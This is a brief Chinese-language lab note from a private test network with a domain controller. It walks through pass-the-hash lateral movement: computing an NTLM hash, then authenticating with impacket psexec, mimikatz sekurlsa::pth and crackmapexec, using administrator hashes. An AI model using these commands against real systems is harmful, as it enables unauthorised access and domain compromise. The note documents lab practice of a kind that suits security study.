1. 实验网络拓扑
kali:
192.168.72.128
win2008:
192.168.135.129
192.168.72.139
win7:
192.168.72.149
win2012:(DC)
192.168.72.131
2. EXPLOIT
0x0. NTLM hash计算脚本
python3 -c 'import hashlib,binascii; print (binascii.hexlify(hashlib.new("md4", "123qweQWE".encode("utf-16le")).digest()))'
0x1. psexec.py
Impacket\example\psexec.py
python3 psexec.py win2008@192.168.72.139 -hashes 0:8320b7c94e8dcbbb34a9e5f9443cb569
0x2. mimikatz
用sekurlsa::pth模块:
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:intranet.com /ntlm:d92f28ef1db7d97706a7bb3983632cf7" "exit"
验证:
dir \\dc.intranet.com\c$
0x3. crackmapexec
crackmapexec smb 192.168.72.131 -u administrator -H d92f28ef1db7d97706a7bb3983632cf7 -d intranet.com -x "whoami"
0x4. MSF
exploit/windows/smb/psexec
试了好多次,都报错。。。
0x05. CS
CobaltStrike图形化就太简单了。。。不写了。。
